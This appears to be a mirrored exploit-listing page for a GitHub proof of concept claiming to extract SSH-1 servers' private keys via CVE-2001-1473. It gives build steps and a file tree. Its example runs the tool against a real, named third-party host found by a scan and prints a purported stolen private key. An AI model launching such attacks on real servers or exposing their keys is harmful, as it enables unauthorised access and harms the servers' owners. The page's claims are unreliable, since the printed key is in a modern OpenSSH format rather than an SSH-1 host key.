CVE-2001-1473 PoC — SSH-1协议私钥计算漏洞

Source

https://github.com/m00n3rrr/poc-CVE-2001-1473

Associated Vulnerability

Title:SSH-1协议私钥计算漏洞 (CVE-2001-1473)
Description:The SSH-1 protocol allows remote servers to conduct man-in-the-middle attacks and replay a client challenge response to a target server by creating a Session ID that matches the Session ID of the target, but which uses a public key pair that is weaker than the target's public key, which allows the attacker to compute the corresponding private key and use the target's Session ID with the compromised key pair to masquerade as the target.

Description

poc-CVE-2001-1473

Readme


# How to exploit CVE-2001-1473


We employed a novel approach to an age-old vulnerability in the [SSH-1](https://packetstormsecurity.com/files/22442/ssh-1.2.30.tar.gz.html) protocol, as described by [CVE-2001-1473](https://nvd.nist.gov/vuln/detail/CVE-2001-1473). This vulnerability enables a Man-in-the-Middle (MITM) server to intercept an SSH-1 session between a client and a vulnerable server, potentially exposing the user's private key. However, executing a practical attack necessitates the client's usage of the attacking server as a hopping node and granting permission for unknown server keys, significantly increasing the complexity of a successful exploit.

Our adaptation of the original attack method enables the extraction of the SSH server's private key itself, offering access to the vulnerable server with sshd permissions. Notably, this modified approach eliminates the MITM requirement and can be executed directly against the vulnerable server.

For technical details, read [our paper](method.md). 

# Install


```bash
./configure
make
make install
```

The code is installed in `/usr/local/bin`.

# Example

One of the vulnerable hosts detected in nuclei scan:

```
[CVE-2001-1473] [tcp] [high] nmr.ioc.ac.ru:22
```

Launching an attack:

```text
dcow -s nmr.ioc.ac.ru

pk retrieved:
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEA18RGKpk+UHIKVDnRcaoHI97YDp1mAu+9gMcako/uFZkRFG1p/XHz
CL+/EZ9cGc0KT6fRzAGHxxfeJ4j4gsAFzBFaMWx2jfEinduSQGdxi4JtdqCY2Y8+YrIORg
mpOtwi+Pxue1R4JndIhH+AXVUptODrU1clBtZePcLd5aG4JVzyX0c2+BA0ekadyhAySvqS
bTCTQNVt0eB0JUmHjYh3FIk9AjnAnDe6F7iPeq0dPwfSAY13QS3WGX38tMWjDHntrWACEf
9zE9QCDDquwM3hs3cah9c+jzvDK2AKD3EOwXHF8Df4CHZ2L4x3AXqxbRgZZE3+nTa0Dt4h
ITAsyKp7a0DVzCwtK0DB1LfUPkWnxeIMcZQkTdcjypr9/9VqgacHvZjmKOf3utBglHfnWk
...

```


# Disclaimer

This Proof of Concept (PoC) is intended solely for white-hat purposes and educational use. It has been created to demonstrate potential security vulnerabilities in a controlled, ethical, and lawful environment. It is not designed for malicious activity, exploitation of real systems, or any illegal purposes.

Any unauthorized or illegal use of this PoC is strictly prohibited and may result in legal consequences. The author is not responsible for any misuse of this code or any damage caused by its improper use.

Use this PoC responsibly, within the bounds of ethical hacking guidelines and in accordance with applicable laws.

File Snapshot


 [4.0K]  /data/pocs/6cc2a16861a3b1464171019d9d83460c2e96c488
├── [1.2M]  configure
├── [ 947]  CONTRIBUTING.md
├── [9.9K]  dcow.cpp
├── [4.0K]  golang
│   ├── [ 197]  makefile
│   ├── [ 356]  README.md
│   └── [4.0K]  src
│       ├── [4.0K]  expl
│       │   └── [8.1K]  expl.go
│       └── [4.0K]  main
│           └── [2.5K]  main.go
├── [4.0K]  legacy
│   ├── [ 10K]  dcow.cpp
│   ├── [ 132]  makefile
│   └── [ 150]  README.md
├── [7.9K]  method.md
├── [2.4K]  README.md
└── [   7]  version

5 directories, 13 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!